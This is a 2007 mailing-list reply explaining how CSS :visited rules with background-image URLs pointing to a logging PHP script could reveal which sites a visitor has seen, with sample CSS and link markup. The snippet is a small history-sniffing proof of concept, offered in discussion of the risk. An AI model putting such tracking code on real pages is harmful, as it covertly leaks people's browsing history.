[_] Direct scripting with CSS alone
Chris Kaminski
chris at setmajer.com
Wed Sep 5 13:27:05 BST 2007
On 5 Sep 2007, at 13:03, Rick Hurst wrote:
> gulp - combined with javascript there is some serious snooping
> potential there surely?
No JS needed — the easiest way to exploit would be to just request a
PHP URL via a background image:
a.someURL:visited { background: url(visitlogger.php?site=url); }
a.someOtherURL:visited { background: url(visitlogger.php?
site=otherurl); }
<a class="someURL" href="url">a link</a>
<a class="someOtherURL" href="otherurl">another link</a>
Of course, linking User X with Browser Y making request Z is the
tricky part, and pretty well necessary for the exploit to be of any
use I should think.
I expect there are ways to do it, but all will rely on some other
security hole (e.g. viewing remote-hosted images in an email).
ck